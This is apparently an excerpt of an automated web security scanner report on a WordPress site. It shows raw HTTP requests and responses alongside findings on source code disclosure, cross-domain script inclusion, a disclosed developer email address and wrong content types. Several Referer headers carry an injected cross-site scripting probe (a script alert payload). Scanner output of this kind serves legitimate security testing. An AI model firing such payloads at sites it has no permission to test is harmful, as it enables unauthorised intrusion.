HTTP/1.1 200 OK Date: Wed, 09 Feb 2011 13:20:18 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Link: <http://wp.me/POZcu-3Y>; rel=shortlink Set-Cookie: PHPSESSID=e3sc4fomn182rfjcvlhh1i0e97; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 49364
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The application appears to disclose some server-side source code written in ASP.
Issue background
Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.
Issue remediation
Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.
Request
GET /wp-content/plugins/wp-highlightjs/highlight.pack.js HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 200 OK Date: Wed, 09 Feb 2011 13:21:32 GMT Server: Apache/2.2.3 (CentOS) Vary: Accept-Encoding,User-Agent Last-Modified: Wed, 24 Nov 2010 10:31:07 GMT Accept-Ranges: bytes X-Powered-By: W3 Total Cache/0.9.1.3 Connection: close Content-Type: application/x-javascript Content-Length: 94928
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
Request
GET /wiki/Main/ImageSnap HTTP/1.1 Host: www.vogel-nest.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 09 Feb 2011 13:20:18 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Link: <http://wp.me/POZcu-3Y>; rel=shortlink Set-Cookie: PHPSESSID=e3sc4fomn182rfjcvlhh1i0e97; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 49364
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
The following email address was disclosed in the response:
todd@wpaudio.com
Request
GET /wp-content/plugins/wpaudio-mp3-player/wpaudio.min.js?ver=3.1 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05; __utmz=176138661.1297257723.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=176138661.2034632851.1297257723.1297257723.1297257723.1; __utmc=176138661; __utmb=176138661.1.10.1297257723
Response
HTTP/1.1 200 OK Date: Wed, 09 Feb 2011 13:21:34 GMT Server: Apache/2.2.3 (CentOS) Vary: Accept-Encoding,User-Agent Last-Modified: Thu, 28 Oct 2010 08:59:12 GMT Accept-Ranges: bytes X-Powered-By: W3 Total Cache/0.9.1.3 Connection: close Content-Type: application/x-javascript Content-Length: 8868
/* * WPaudio v3.1 (http://wpaudio.com) * by Todd Iceton (todd@wpaudio.com) * * Converts an mp3 link to a simple player styled by HTML & CSS, powered by HTML5 with SoundManager2 Flash fallback * * Copyright 2010 Todd Iceton (email: todd@wpaudio.com) * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of ...[SNIP]...
6. Content type incorrectly statedprevious There are 3 instances of this issue:
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.